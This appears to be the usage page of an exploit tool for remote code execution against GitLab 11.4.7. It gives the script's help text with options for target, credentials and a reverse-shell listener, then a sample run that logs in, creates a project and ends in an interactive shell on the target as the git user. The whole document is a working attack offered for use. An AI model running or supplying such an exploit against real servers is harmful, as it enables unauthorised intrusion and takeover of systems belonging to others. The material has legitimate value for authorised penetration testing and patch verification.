GitLab 11.4.7 Remote Code Execution
$ python3 exploit.py --help
usage: exploit.py [-h] -t TARGET -u USERNAME -p PASSWORD -li LISTENER_IP [-lp LISTENER_PORT]
GitLab 11.4.7 Remote Code Execution Exploit
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
GitLab URL - http://10.10.10.10:8000/
-u USERNAME, --username USERNAME
GitLab username
-p PASSWORD, --password PASSWORD
GitLab password
-li LISTENER_IP, --listener-ip LISTENER_IP
IP for reverse shell
-lp LISTENER_PORT, --listener-port LISTENER_PORT
Port for reverse shell
$ python3 exploit.py -t http://10.10.10.10:8080/ -u username -p password -li 10.10.10.1
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.10 on port 56708
[+] Found CSRF token: Y7/CPi+gF3Xdk5IfskectTsqZmfwO1cnnRVl1dN5sdflJBvH5niBtdm2pSsAg0B/mQwYdGa71RXlwGbB3Kit+g==
[+] Logged in
[+] Found CSRF token: pX/a0Sq5xdV/q/jr0t2w+rpZ9NXn3xt0AwyznR6mGcSNwyLMHSEeo4IcooG0J//3wK6U172pIr9ApTnnlBJKYw==
[+] Found namespace ID: 6
[+] New project created
[*] Switching to interactive mode
$ id
uid=998(git) gid=998(git) groups=998(git)